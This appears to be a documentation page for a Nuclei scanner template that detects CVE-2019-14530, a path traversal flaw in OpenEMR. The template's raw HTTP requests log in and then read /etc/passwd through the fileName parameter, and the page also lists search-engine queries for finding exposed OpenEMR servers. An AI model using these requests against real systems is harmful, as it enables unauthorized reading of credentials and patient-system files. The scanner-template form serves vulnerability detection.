Skip to content
Nuclei Templates

OpenEMR <5.0.2 - Local File Inclusion

ID: CVE-2019-14530

Severity: high

Author: TenBird

Tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr

Description

Section titled “Description”

OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.

YAML Source

Section titled “YAML Source”
id: CVE-2019-14530


info:
  name: OpenEMR <5.0.2 - Local File Inclusion
  author: TenBird
  severity: high
  description: |
    OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
  remediation: |
    Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50037
    - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
    - https://github.com/openemr/openemr/pull/2592
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14530
    - https://github.com/sec-it/exploit-CVE-2019-14530
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-14530
    cwe-id: CWE-22
    epss-score: 0.80535
    epss-percentile: 0.98316
    cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: open-emr
    product: openemr
    shodan-query:
      - http.html:"openemr"
      - http.title:"openemr"
      - http.favicon.hash:1971268439
    fofa-query:
      - icon_hash=1971268439
      - body="openemr"
      - title="openemr"
      - app="openemr"
    google-query: intitle:"openemr"
  tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr


http:
  - raw:
      - |
        POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
      - |
        GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - filename=passwd


      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a004630440220608979f3f1b471f96dd6fb2ee246ecc5d6441aa38b0e3997383cf096f9a2264602200283cfb0c8c3097eb0018524309ced933607d4d004760e8dabe2844d54e92f65:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-14530.yaml"

View on Github